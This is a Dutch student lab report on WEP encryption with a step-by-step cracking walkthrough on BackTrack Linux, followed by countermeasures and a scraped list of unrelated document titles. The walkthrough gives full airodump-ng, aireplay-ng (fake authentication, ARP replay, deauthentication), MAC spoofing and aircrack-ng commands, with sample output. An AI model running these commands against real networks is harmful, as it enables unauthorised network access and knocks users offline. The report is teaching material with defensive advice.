1 WEP (Wired Equivalent Privacy) Wat is WEP? Hoe werkt WEP?...3

Maat: px
Weergave met pagina beginnen:

Download "1 WEP (Wired Equivalent Privacy)...2 1.1 Wat is WEP?...2 1.2 Hoe werkt WEP?...3"

Transcriptie

1 Inhoudstafel 1 WEP (Wired Equivalent Privacy) Wat is WEP? Hoe werkt WEP? Hacken van WEP Inleiding Leren werken met de Back Track Linux distro Zoeken naar draadloze netwerken met Kismet Pakketjes sniffen (IVs) met airodump-ng Fake authentication attack Opgevangen pakketjes terug verzenden met aireplay DE-AUTH attack Het kraken van de WEP key Problemen Tegenmaatregelen Use WPA with a strong key Change the default settings on your access point Update your firmware Network segregation Turn off the WLAN when not in use Fake AP Eventuele extra maatregel Conclusie... 15

2 1 WEP (Wired Equivalent Privacy) 1.1 Wat is WEP? WEP (Wired Equivalent Privacy) is een schema dat deel uitmaakt van de IEEE draadloze netwerkstandaard om draadloze netwerken te beveiligen. Draadloze netwerken zijn zeer gevoelig voor hacking (Eavesdropping; letterlijk: afluisteren) omdat ze informatie uitzenden via radiogolven. De bedoeling achter WEP was dezelfde beveiligingsmogelijkheden te kunnen bieden als een traditioneel netwerk (met draden). Er werden een aantal zwaktes vastgesteld door encryptie specialisten. Zo blijkt dat iedere WEP sleutel in korte tijd te kraken valt met een aantal softwareprogramma s. WEP werd opgevolgd in 2003 door WPA (Wi-Fi Protected Access) en in 2004 door WPA2. WEP is alleen geschikt voor thuisgebruik om vreemden die gemakkelijk toegang tot iemands draadloze netwerk (en waarschijnlijk internetverbinding) te ontzeggen. 2/16

3 1.2 Hoe werkt WEP? Van de te verzenden data wordt een CRC32-checksum berekend. Deze checksum wordt achter de data geplakt. Het nieuwe geheel (Data + CRC32(Data)) wordt de 'plaintext' genoemd. ('Plain', omdat dit stuk nog niet gecodeerd is en dus gewoon leesbaar.) De keystream wordt als volgt berekend: keystream = RC4(IV, sleutel). o IV = initiële vectoren. Dit zijn een aantal willekeurige getallen die mogen, maar NIET moeten (volgens de IEEE WEP-specificaties), veranderen bij elk nieuw verzonden pakket. o sleutel = een afgesproken 'wachtwoord' dat gebruikt wordt, en door beide NIC's op voorhand gekend is. Het pakket wordt samengesteld: Eerst worden de keystream en plaintext samen ge-xor'd, en vervolgens wordt de IV voor het pakketje geplakt. Dan word het pakket verzonden. Kort samengevat: pakket = IV + XOR(data + crc32(data), RC4(IV, sleutel)) Bij WEP encryptie wordt een 64 bits of een 128 bits sleutel gebruikt. Het instellen van WEP kan verwarrend zijn. 40 bits en 64 bits betekenen hetzelfde. WEP gebruikt een initialization vector (IV) van 24 bits. Dit is een stuk van de sleutel die niet door de gebruiker verzonnen wordt. De ene fabrikant zet 40 bits (64-24) in zijn router, de andere 64 bits. Hetzelfde geldt voor 128 bit en 104 bit. Netwerkkaarten die 128 bits WEP encryptie ondersteunen kunnen samenwerken met netwerkkaarten die een 64 bits sleutel gebruiken, mits de 128 bits kaarten ook 64 bits encryptie ondersteunen. WEP sleutels kunnen verschillende vormen hebben: ASCII of hexadecimaal. 3/16

4 2 Hacken van WEP 2.1 Inleiding In deze handleiding beschrijven we het kraken van WEP via de software die beschikbaar is op de Back Track Linux distro. We overlopen alle stappen die nodig zijn voor het hacken, maar we schenken ook aandacht aan de uitzonderingen die wel eens durven voorkomen. Al de stappen kan je via de console uitvoeren aangezien het allemaal consoleapplicaties zijn en omdat dit gemakkelijker werkt op een laptop. Onze opstelling: Een draadloos accesspoint, beveiligd met 128bits WEP encryptie. Het ESSID wordt niet gebroadcast. Een laptop met een PRISM g Wireless Adapter (3890) netwerkkaart. Deze heeft een Intersil PRISM GT chipset. Het draadloze netwerk heeft geen gebruikers. Daarom hebben we MAC filtering uitstaan. De gebruikte netwerkkaart heeft alles aan boord voor het binnendringen van een draadloos netwerk: Chipset Supported by airodump for Windows Supported by airodump for Linux Supported by aireplay for Linux PrismGT YES FullMAC: YES YES (driver patching recommended) SoftMAC: NOT YET Uit deze handleidingen halen we onze mosterd: De mannier die wij volgen voor het hacken van WEP, wordt op het internet ook wel eens WEP Cracking, the FBI Way genoemd. 4/16

5 2.2 Leren werken met de Back Track Linux distro. Voordat we kunnen beginnen is het nodig dat we met de Live CD kunnen werken. Hier volgen enkele basis commando s die wij gebruiken: Commando s Resultaat login: root Inloggen. Deze gegevens kan je op het welkomstscherm paswoord: toor vinden. alt+f1-f6 Switch tussen de 6 beschikbare consoles. alt+f7 Ga naar KDE vanuit de console. ctrl+alt+f8 Keer terug naar de console vanuit KDE. loadkeys be-latin1 Dit stelt het toetsenbord van de console in op azerty. In KDE: via de Amerikaanse vlag. xconf Autoconfiguratie van de grafische kaart voor betere prestaties. We gebruiken dit niet aangezien we zonder dit commando in een hogere resolutie werken. startx BackTrack start KDE. flux BackTrack start fluxbox. Dit is een lichte x window manager. leetmode Systeeminfo op het bureaublad. ctrl+alt+backspace Sluit de gui. (of Log Out ) reboot Computer opnieuw opstarten. poweroff Sluit de computer af. BackTrack is een distro gebaseerd op Slax, een live CD van Slackware, die gebruikt wordt om netwerken door te lichten. Daarom worden de netwerkonderdelen niet automatisch geconfigureerd bij het inpluggen. Om je netwerkkaarten op te starten via een DHCP (Dynamic Host Control Protocol) server (deze kent je automatisch een IP toe) typ je: dhcpcd dhcpcd eth1 Grafisch: K -> Internet -> Set IP Address Als alles goed is ingeplugd, kan je nu surfen. (gebruikt standaard eth0) voor een specifieke interface. In dit geval de gewone netwerkkaart. ifconfig toont alle netwerk interfaces. Dit hebben we later ook nodig om het MAC adres op te zoeken. (iwconfig) eth1 Link encap:ethernet HWaddr 00:0A:E4:4D:F6:4C inet addr: Bcast: Mask: Een usb-stick mounten doe je als volgt: mount /dev/sda1 /mnt/sda1_removable umount sda1_removable 5/16

6 2.3 Zoeken naar draadloze netwerken met Kismet Kismet is een layer2 wireless network detector, sniffer en intrusion detection system. Het werkt met elke netwerkkaart die raw monitoring (rfmon) mode ondersteunt. Het kan b, a en g verkeer sniffen. Kismet vindt netwerken door passief pakketjes te verzamelen. Het kan benoemde en verborgen netwerken (deze broadcasten hun ESSID niet) ontdekken. Je moet je draadloze netwerkkaart in monitor mode plaatsen voordat je kismet kan opstarten. Met de snelkoppeling in de gui is dit niet nodig. airmon-ng start eth0 airmon-ng <start stop> <interface> [channel] Hiermee kan je de interface uit monitor mode halen of op een bepaald kanaal vastzetten. kismet start Kismet op in de console Te gebruiken commando s: m mute sound h help window. Toont een venster met al de commando s. x/q close window s sorteer de lijst van netwerken (dit is nodig om een bepaald netwerk te kunnen vastzetten) L lock channel i Network details c Toon een lijst van alle verbonden computers. Als MAC filtering geactiveerd is, kan je uit deze lijst een MAC adres kiezen. Kismet toont de beschikbare netwerken. Het SSID kan nog niet gevonden worden aangezien er geen gebruikers zijn. We beschikken nu over het BSSID (MAC adres) en het kanaal van het accespoint. Kismet kan IVs opvangen, maar we gaan hiervoor airodump-ng gebruiken. Sluit Kismet. 6/16

7 2.4 Pakketjes sniffen (IVs) met airodump-ng Airodump-ng wordt gebruikt voor het opvangen van ruwe frames en is in het bijzonder geschikt voor het verzamelen van WEP IVs (initialization vectors). Het is de bedoeling dat we deze opgevangen IVs gaan gebruiken om WEP te kraken met aircrack-ng. Start het programma voor het opvangen van IVs: airodump-ng w vangop c 2 --ivs eth0 eth0 De naam van de draadloze netwerkkaart. -w vangop Plaatst de gesnifte pakketjes in een bestand vangop-01.cap. Of vangop- 01.ivs als de parameter i is meegegeven. --write <prefix> -c 2 Het programma zal enkel kanaal 2 sniffen. Dit kom je te weten met kismet. --channel <channel> -i Enkel de IVs opslaan. Geen overbodige data voor het kraken. --ivs Bovenaan het scherm staan al de beschikbare netwerken en onderaan staat een lijst van de verbonden gebruikers. Uitleg van de kolomkoppen kan je vinden op 7/16

8 2.5 Fake authentication attack Aangezien er in onze testomgeving geen gebruiker is, hebben we een MAC adres nodig voor de volgende aanvallen, die het IVs opvangen versnellen. Als er wel gebruikers met het netwerk verbonden zijn, dan is het beter om daar een MAC adres van te nemen voor de volgende aanvallen. De fake authentication aanval genereert geen ARP aanvragen. MAC adres aan netwerkkaart toekennen. Hierdoor zullen de volgende aanvallen ook beter verlopen. Deze stappen kan je ook gebruiken als MAC-filtering opstaat. ifconfig eth0 down ifconfig eth0 hw ether 00:11:22:33:44:55 ifconfig eth0 up of: macchanger m 00:11:22:33:44:55 eth0 Onder Windows kan dit met Mac MakeUp. aireplay-ng --fakeauth 0 -a 00:30:BD:C9:E6:08 -h 00:11:22:33:44:55 -e 'essidnaam' eth0 --fakeauth 0 of -1 0 naam van de aanval + delay -a <bssid> Access Point MAC adres -h <smac> Bron MAC adres -e <essid> ESSID foutmelding: ARP linktype is set to 1 (Ethernet) expected ARPHRD_IEEE80211 or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run ifconfig eth0 up; iwconfig eth0 mode Monitor channel <#> Sysfs injection support was not found either. Oplossing: zet de netwerkkaar in monitor mode en op het juiste kanaal. airmon-ng start eth0 2 14:00:08 Sending Authentication Request 14:00:08 Authentication successful 14:00:08 Sending Association Request 14:00:08 Association successful :-) Probleem: om deze aanval te kunnen doen hebben we het ESSID nodig. Dit weten we niet. Je hebt gebruikers nodig om de aanvallen te kunnen uitvoeren en kismet of airodump-ng zullen het ESSID ontdeken. Als er geen gebruikers zijn, moet je het ESSID weten om WEP te hacken. Anders kan je de fake auth aanval niet uitvoeren. 8/16

9 2.6 Opgevangen pakketjes terug verzenden met aireplay Aireplay gaat pakketjes proberen te vangen die mogelijk IVs bevatten. Hij gaat deze info naar de accespoint verzenden en blijft dit herhalen. Aireplay doet zich voor als de computer waarop we later de deauth aanval uitvoeren. We gaan een ARP request, die IVs bevat, terug verzenden. aireplay-ng --arpreplay -b 00:30:BD:C9:E6:08 -h 00:11:22:33:44:55 eth0 --arpreplay of -3 naam van de aanval -b MAC adres accespoint -h MAC adres van een pc die met het accespoint is verbonden. Dit is hier het MAC adres van de fake authentication attack. eth0 De naam van de draadloze netwerkkaart. Voer het commando uit. Het zal zoeken naar pakketjes. De deauth aanval zal het proces doen versnellen. Laat dit proces draaien tot je voldoende pakketjes hebt of begin al te kraken terwijl de pakketjes binnenstromen. Je hebt ongeveer IVs nodig voor 40-bit WEP en meer dan voor een 104-bit sleutel. We zullen zien dat dit met minder ook gaat. 9/16

10 2.7 DE-AUTH attack Nu laten we aireplay-ng een deauth aanval uitvoeren. Deze aanval zal een specifieke machine de verbinding met de accespoint laten verliezen. Deze pc zal automatisch terug verbinding proberen te maken. Tijdens dit proces zal het een ARP pakket verzenden. Het is de bedoeling dat we het met de vorige stap opvangen om het opnieuw te kunnen versturen. Tijdens het herverbinden kan je het ESSID sniffen. aireplay-ng --deauth 5 -a 00:30:BD:C9:E6:08 -c 00:11:22:33:44:55 eth0" --deauth 5 Het aantal keer dat de aanval moet gebeuren. Aangezien dat we hier niet met een echte gebruiker te maken hebben, laten we dit 5 keer gebeuren. Voor het ESSID te ontdekken is 1 voldoende. -a <bssid> Access Point MAC adres -c MAC adres van de pc waartegen we de aanval uitvoeren. eth0 De naam van de draadloze netwerkkaart. 10/16

11 2.8 Het kraken van de WEP key De IVs die we met airodump-ng opgevangen hebben, zullen we kraken met aircrackng. aircrack-ng -f 4 -m 00:30:BD:C9:E6:08 -n 128 capture-01.ivs Zonder al de parameters werkt het ook, maar met de parameters kan je enkele zaken specifiëren. -f 4 Hiermee kan je de fudge bepalen. Standaard staat dit op 2. Hoe hoger de waarde, hoe hoger het bruteforce niveau zal zijn. Het kraken zal meer tijd vragen, maar de graad van succes ligt hoger. -m Hiermee kies je het netwerk dat je wil kraken. In ons geval is dit overbodig aangezien er maar één netwerk beschikbaar is. -n 64 De hoeveelheid bits in de sleutel. Standaard 128. capture-01.ivs De naam van het bestand dat gemaakt wordt door airodump-ng. Het.dump bestand dat door Kismet wordt aangemaakt kan ook worden gebruikt. -k <korek> attack method (1 to 17) Enkele resultaten terwijl de IVs binnenlopen: 128bit key: 7sec IVs (fudgefactor 2; n 128) 128bit key: 28sec IVs (fudgefactor 4) 128bit key: 6sec IVs (fudgefactor 4; n 128) 128bit key, IVs: (veel minder dan de aanbevolen ) parameters tijd -f 2 n 128 7sec (1406 keys getest) -f 1 niet gevonden -f 2 k sec (593 keys getest) -f 3 70sec ( keys getest) -f 3 k sec (5246keys getest) -f 4 n 128 na 30 min stopgezet 128bit key, IVs parameters tijd -f 1 6sec (122 keys getest) -f 1 k sec (122 keys getest) -f 2 6sec (122 keys getest) -f 2 k sec (122 keys getest) -f 4 6sec (122 keys getest) -f 8 6sec (122 keys getest) 128bit key, IVs -> doet er steeds 10sec over (dezelfde key) Afhankelijk van het aantal IVs dat je hebt, zijn er opties die beter werken. Een fudge factor van 4 zorgt in de meeste gevallen voor een resultaat. voor meer info. 11/16

12 2.9 Problemen Hier enkele problemen die kunnen opduiken: - geen pc verbonden met het draadloze netwerk; - geen SSID gevonden; - MAC filtering; - netwerkkaart kan niet meer verbinden met een netwerk. Als er geen pc met het netwerk is verbonden, kunnen we wel zorgen dat we aan de WEP key geraken, maar als het SSID niet wordt gebroadcast, dan moeten we wachten tot iemand verbinding maakt met het netwerk. Anders kunnen we het SSID niet vinden. Als MAC filtering op staat, dan moeten we wachten tot iemand verbind om daarna het MAC adres te kunnen kopiëren. Het kan zijn dat je netwerkkaart niet meer wil verbinden met een draadloos netwerk via Linux noch Windows. In ons geval was dit op deze manier opgelost: iwconfig eth0 mode auto essid any De kaart bevond zich in managed mode en zat niet vast in monitor mode, maar toch lukte het niet om een werkende verbinding tot stand te brengen. 12/16

13 3 Tegenmaatregelen 3.1 Use WPA with a strong key WPA is a definite improvement over WEP in providing wireless security. But the version intended for home and SOHO use - WPA-PSK - has a weakness shared by any passphrase security mechanism. The choice of simple, common and short passphrases may allow your WPA-protected WLAN to be quickly compromised via dictionary attack. 3.2 Change the default settings on your access point Default settings (SSID, administrator password, channel) are well known and even included as part of some WLAN attack tools. 3.3 Update your firmware This is helpful if your AP or client doesn't currently support WPA. Many manufacturers have newer firmware for g products that add WPA support. You may also find this for b gear, but it's not as common. Check anyway! 3.4 Network segregation Put your access point on a separate subnet, with a firewall separating the wireless and internal users. 3.5 Turn off the WLAN when not in use A $5 lamp timer from your local hardware store is a simple, but effective way to keep your WLAN or LAN from harm while you're sleeping. Bickers (FBI agent) also said that if you have an access point that can swap keys fast enough, you may be able to stay ahead of an attacker. "Most likely they will get bored and attack someone else." But for most WLAN owners, this method isn't practical. Bron: FBI Teaches Lesson In How To Break Into Wi-Fi Networks 3.6 Fake AP If one access point is good, 53,000 must be better. Black Alchemy's Fake AP generates thousands of counterfeit b access points. Hide in plain sight amongst Fake AP's cacophony of beacon frames. As part of a honeypot or as an instrument of your site security plan, Fake AP confuses Wardrivers, NetStumblers, Script Kiddies, and other undesirables. Fake AP is a proof of concept released under the GPL. 13/16

14 3.7 Eventuele extra maatregel MAC adressen filteren is een beveiligingsmethode die vaak in combinatie met encryptie gebruikt wordt. Een MAC adres (ook wel 'hardware adres' of 'fysiek adres' genoemd) is een ingebakken adres dat uniek is voor elk netwerkapparaat. Het MAC adres is een hexadecimale code van twaalf tekens, bijvoorbeeld 00-C0-26-A9-42-F7. Deze code kan gebruikt worden om toegang tot het netwerk toe te zeggen of juist te blokkeren. In feite is het erg gemakkelijk. Hoe vind ik het MAC adres van mijn netwerkkaart(en)? Ga in Windows XP 0f 2000 naar Start > Run (uitvoeren) > type 'cmd' > type 'ipconfig /all' in de prompt. Het MAC adres staat in het lijstje achter 'physical address' of 'fysiek adres'. MAC adressen filteren is een beveiliging die vaak bovenop encryptie gebruikt wordt. Een combinatie van WPA TKIP met MAC adres filters is voor de thuisgebruiker een zéér degelijke beveiliging. 14/16

15 4 Conclusie Onze opdracht van het kraken van WEP is geslaagd zoals je kunt zien op volgende screenshot. Zoals we in ons verslag al beschreven hebben, is een netwerk beveiligd met WEP niet ideaal. Maar het is wel beter als helemaal niets. Als het mogelijk is, gebruik dan WPA in plaats van WEP. 15/16

16 16/16

PRACTICUM COMPUTERNETWERKEN E-BOOK

PRACTICUM COMPUTERNETWERKEN E-BOOK PRACTICUM COMPUTERNETWERKEN 2EA-ICT2 E-BOOK Hogeschool Antwerpen campus Paardemarkt Academiejaar 2005-2006 Netwerkcomponenten 2 1 Inhoudsopgave 1 Inhoudsopgave...2 2 Inleiding...8 3 IPSec...9 3.1 Doelstellingen...9

Nadere informatie

Een internetverbinding draadloos delen

Een internetverbinding draadloos delen Draadloos internet heeft de toekomst, maar het zal nog even duren voordat u dit betaalbaar via uw telecomaanbieder kunt doen. Maar wel kunt u alvast een eigen draadloos netwerk aanleggen om overal in huis

Nadere informatie

Gebruikershandleiding. Linksys E2000 Advanced Wireless-N router

Gebruikershandleiding. Linksys E2000 Advanced Wireless-N router Gebruikershandleiding Linksys E2000 Inhoudsopgave Inhoudsopgave Hoofdstuk 1: Productoverzicht 1 Bovenkant......................................................... 1 Achterkant........................................................

Nadere informatie

Wireless kabel/dslgatewayrouter. Routeur câble/adsl sans fil

Wireless kabel/dslgatewayrouter. Routeur câble/adsl sans fil P74219df_F5D7230-4_man.qxd 10-03-2003 15:44 Page 1 Wireless kabel/dslgatewayrouter Voor het delen van uw breedband-internetaansluiting en bestanden Routeur câble/adsl sans fil Partagez votre accès Internet

Nadere informatie

U.S. ROBOTICS 802.11g 54Mbps ROUTER

U.S. ROBOTICS 802.11g 54Mbps ROUTER U.S. ROBOTICS 802.11g 54Mbps ROUTER GEBRUIKERSHANDLEIDING rev 1.0 9-04 R24.0773.00 Handelsmerken: Andere product- en bedrijfsnamen zijn handelsmerken of gedeponeerde handelsmerken van hun respectieve eigenaars.

Nadere informatie

Geavanceerde gebruikershandleiding internet Cisco

Geavanceerde gebruikershandleiding internet Cisco Geavanceerde gebruikershandleiding internet Cisco Welkom bij Internet van Ziggo Van harte welkom bij Internet van Ziggo. Met deze geavanceerde handleiding kunt u de instellingen wijzigen van uw Wi-Fi

Nadere informatie

Geavanceerde gebruikershandleiding internet

Geavanceerde gebruikershandleiding internet Geavanceerde gebruikershandleiding internet Welkom bij Internet van Ziggo Van harte welkom bij Internet van Ziggo. Met deze geavanceerde handleiding kunt u de instellingen wijzigen van uw Wi-Fi modem.

Nadere informatie

range extender/ accesspoint

range extender/ accesspoint Universele draadloze G range extender/ accesspoint Belkin Ltd. Express Business Park, Shipton Way Rushden, NN10 6GL, Groot-Brittannië +44 (0) 1933 35 2000 +44 (0) 1933 31 2000 fax Belkin B.V. Boeing Avenue

Nadere informatie

Backup Connect Client Simple Interface

Backup Connect Client Simple Interface Backup Connect Client Simple Interface Let s Connect Inhoudstafel Welcome to Backup Partner version 2.0 - Simple Interface... 1 How does Backup Partner Work?... Fout! Bladwijzer niet gedefinieerd. Backup

Nadere informatie

Draadloze G USB-netwerkadapter

Draadloze G USB-netwerkadapter Draadloze G USB-netwerkadapter Belkin Ltd. Express Business Park Shipton Way Rushden NN10 6GL Groot-Brittannië Tel: +44 (0) 1933 35 2000 Fax: +44 (0) 1933 31 2000 Belkin B.V. Starparc Building Boeing Avenue

Nadere informatie

Fedora 10. Uitgave Informatie. Fedora Documentation Project

Fedora 10. Uitgave Informatie. Fedora Documentation Project Fedora 10 Uitgave Informatie Fedora Documentation Project Copyright 2007, 2008 Red Hat, Inc. and others. The text of and illustrations in this document are licensed by Red Hat under a Creative Commons

Nadere informatie

LOGBOEK. NETWERK l419b-04

LOGBOEK. NETWERK l419b-04 Thomas Debray 3 TIN C LOGBOEK NETWERK l419b-04 Index CONFIGURATIE...3 Overzicht...4 Sensors...5 Fysieke harde schijven...5 Netwerk...6 Apparaatbronnen...6 FEDORA...7 Geïnstalleerde software...8 Nuttige

Nadere informatie

TIRLNX01. Keuzevak Linux Dictaat. Auteurs: Kevin van der Vlist kevin@kevinvandervlist.nl. Gedoceerd te: Hogeschool Rotterdam Vestiging Academieplein

TIRLNX01. Keuzevak Linux Dictaat. Auteurs: Kevin van der Vlist kevin@kevinvandervlist.nl. Gedoceerd te: Hogeschool Rotterdam Vestiging Academieplein Keuzevak Linux Dictaat Auteurs: kevin@kevinvandervlist.nl en paul@paulsohier.nl Gedoceerd te: Vestiging Academieplein Versie 1.2 6 december 2011 Samenvatting We proberen jullie wegwijs te maken binnen

Nadere informatie

GNU/Linux op middelbare scholen

GNU/Linux op middelbare scholen GNU/Linux op middelbare scholen Zeus WPI - Werkgroep Informatica Universiteit Gent Mei 2002 Rudy Gevaert, Geert Vernaeve, Mieke Van de Vijver [hier komt dan al wie meeschrijft bij] Copyright c 2002, Zeus

Nadere informatie

GNU/Linux op middelbare scholen

GNU/Linux op middelbare scholen GNU/Linux op middelbare scholen Zeus WPI - Werkgroep Informatica Universiteit Gent Mei 2002 Rudy Gevaert, Geert Vernaeve, Mieke Van de Vijver [hier komt dan al wie meeschrijft bij] Copyright c 2002, Zeus

Nadere informatie

Windows 2000. Tips, Trucs en Achtergronden. Gino Damen 18 december 2001 Versie 1.8

Windows 2000. Tips, Trucs en Achtergronden. Gino Damen 18 december 2001 Versie 1.8 Windows 2000 Tips, Trucs en Achtergronden Gino Damen 18 december 2001 Versie 1.8 Inhoudsopgave Upgraden naar Windows 2000?... 1 De systeem eisen... 2 Hardware compatibiliteit... 2 Software compatibiliteit...

Nadere informatie

Fedora 13 Security Guide

Fedora 13 Security Guide Fedora 13 Security Guide Een gids voor het beveiligen van Fedora Linux Johnray Fuller John Ha David O'Brien Scott Radvan Eric Christensen Adam Ligas Security Guide Fedora 13 Security Guide Een gids voor

Nadere informatie

Pagina 1. Online Back up. Webcreating Easy Back Up GEBRUIKERSHANDLEIDING. Webcreating IT Services 1

Pagina 1. Online Back up. Webcreating Easy Back Up GEBRUIKERSHANDLEIDING. Webcreating IT Services 1 Pagina 1 Online Back up Webcreating Easy Back Up GEBRUIKERSHANDLEIDING 1 INHOUDSOPGAVE Pagina 2 Voorwoord.. Blz. 3 Minimale systeemeisen...blz. 4 Installatie van Webcreating Easy Back-Up..Blz. 5 Inloggen..Blz.

Nadere informatie

Technical White Paper

Technical White Paper Technical White Paper VMware vcloud Director Opgesteld door: Andy Janssens 3SNB Inhoudsopgave 1 Cloud Computing, wat is het en wat houdt het in?... 4 1.1 Wat is Cloud Computing?... 4 1.2 Welke Cloud Computing

Nadere informatie

Netwerken deel 2: Home- en mediaserver

Netwerken deel 2: Home- en mediaserver Netwerken deel 2: Home- en mediaserver Prakticum: Freenas 8.0.1 door Auteur: zondag 17 februari 2013 Versie: U gaat akkoord met... Deze cursus wordt u aangeboden door de Vrienden van de SNT, vzw, in samenwerking

Nadere informatie

Enterprise Network Security : S.S.O & Security Enhancement

Enterprise Network Security : S.S.O & Security Enhancement Scriptie ingediend tot het behalen van de graad van PROFESSIONELE BACHELOR IN DE ELEKTRONICA-ICT Enterprise Network Security : S.S.O & Security Enhancement Nick Wuyts Departement Wetenschappen en Techniek

Nadere informatie

OP MIDDELBARE SCHOLEN

OP MIDDELBARE SCHOLEN ZEUS WPI WERKGROEP INFORMATICA Februari 2003 GNU/LINUX OP MIDDELBARE SCHOLEN David De Wolf, Rudy Gevaert, Terje Hansen, Gaspard Lequeux, Kris Luyten, Filip Rooms, Bert Steppe, Mieke Van de Vijver, Stijn

Nadere informatie

Secure FTP Handleiding

Secure FTP Handleiding Secure FTP Handleiding Aansluiten op Equens Secure File Transfer Final 26-Januari-2015 Classification: Open Version 4.2 Content 1 Inleiding 5 1.1 Onderhoud van dit document 5 1.2 Doelgroep van dit document

Nadere informatie

Audio present. Audio reduction Overload Sanction

Audio present. Audio reduction Overload Sanction NL DATEQ SPL5 Software handleiding Introductie 3 Introductie Power LIMITER µp Controlled Audio Level Guard TimeSlot 1 2 3 Audio present Audio reduction Overload Sanction Reduction RS232 SPL5 SPL 5 De SPL5

Nadere informatie

Technische Opzet TimeTell versie 8

Technische Opzet TimeTell versie 8 Technische Opzet TimeTell versie 8 TIMETELL BV www.timetell.nl Balen van Andelplein 2 2273 KH, Voorburg 070-3114811 info@timetell.nl Helpdesk 070-3114810 helpdesk@timetell.nl Inhoud 1. Inleiding... 4 2.

Nadere informatie

Mr. Parren Mr. Van Geirt Mevr. Erlingen. Groep 5. Netwerkimplementatie. An Liebens Andy Janssens Yoni Millen

Mr. Parren Mr. Van Geirt Mevr. Erlingen. Groep 5. Netwerkimplementatie. An Liebens Andy Janssens Yoni Millen Groep 5 Mr. Parren Mr. Van Geirt Mevr. Erlingen Netwerkimplementatie An Liebens Andy Janssens Yoni Millen INHOUD 1. ALGEMEEN... 1 1.1 Virtueel netwerkschema... 2 1.1.1 Virtueel Netwerkschema... 2 1.2 IP

Nadere informatie

6/10 Bestandstoegang

6/10 Bestandstoegang Storage 6/10 Bestandstoegang 6/10.1 Beheer van bestandstoegang in Open Enterprise Server 2 In NetWare hoefde u eigenlijk helemaal niet na te denken over bestandstoegang. De toegang tot bestanden werd min

Nadere informatie

Uw gebruiksaanwijzing. LINKSYS WRT54G2 http://nl.yourpdfguides.com/dref/2361862

Uw gebruiksaanwijzing. LINKSYS WRT54G2 http://nl.yourpdfguides.com/dref/2361862 U kunt de aanbevelingen in de handleiding, de technische gids of de installatie gids voor. U vindt de antwoorden op al uw vragen over de in de gebruikershandleiding (informatie, specificaties, veiligheidsaanbevelingen,

Nadere informatie

Localisatie van personen met behulp van WiFi en Smart Cards

Localisatie van personen met behulp van WiFi en Smart Cards Faculteit Ingenieurswetenschappen Vakgroep Informatietechnologie Voorzitter: Prof. Dr. Ir. P. Lagasse Localisatie van personen met behulp van WiFi en Smart Cards door Pieter Lootens Tim De Bruyn Promotoren:

Nadere informatie

Admin Tools Gebruikers Handleiding. Nicholas K. Dionysopoulos

Admin Tools Gebruikers Handleiding. Nicholas K. Dionysopoulos Admin Tools Gebruikers Handleiding Nicholas K. Dionysopoulos Admin Tools Gebruikers Handleiding Nicholas K. Dionysopoulos Publication date January 2011 Abstract Dit boek behandelt het gebruik van de Admin

Nadere informatie